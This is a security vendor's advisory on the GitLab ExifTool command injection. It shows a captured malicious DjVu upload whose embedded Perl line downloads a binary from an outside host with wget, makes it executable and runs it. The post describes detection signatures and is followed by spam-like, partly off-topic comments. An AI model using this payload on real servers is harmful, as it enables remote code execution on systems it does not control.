GitLab Unauthenticated Remote ExifTool Command Injection
- Nov 11, 2021
- 1 min read
Updated: Jul 1, 2022
Application Details
GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.
Vulnerability
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Identification
Files that are uploaded with extensions of jpg, jpeg or tiff are passed to the ExifTool to remove any unauthorised tags. The issue is that the file extension will be ignored and the ExifTool will try to determine the type based on the content.
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary
AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") ) Detection
By turning this vulnerability into a traffic file and matching rule, we are able to detect attempts to upload files which don't match the content type.
Coverage
Idappcom has created signature 8021990 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
This is a sobering reminder that even “image tag stripping” workflows can become dangerous. If GitLab CE/EE forwards uploads to ExifTool without strict validation, content-based type detection can be abused for remote command execution. It also highlights how critical extension checks alone are not. For teams using a video proxy for testing or segmentation, ProxyOrb might be worth considering as part of a safer investigation setup, but the real fix must be server-side hardening and allowlisting.
This was a very engaging and insightful post that made a complex concept much easier to understand. I really liked how the author explained each layer in a simple and relatable way. The explanation of the Saunders Research Onion was especially helpful in breaking down research methodology into clear steps. As a student, I often find research frameworks difficult, but content like this makes learning much smoother. During assignments, understanding models like the Saunders Research Onion becomes essential for structuring research properly. Posts like this are incredibly useful for building clarity and confidence in academic writing.
Curious about the technical details behind a photograph, like camera settings, shutter speed, or even GPS location if embedded? An EXIFReader tool online lets you upload an image and view this detailed EXIF (Exchangeable Image File Format) data to better understand your photos.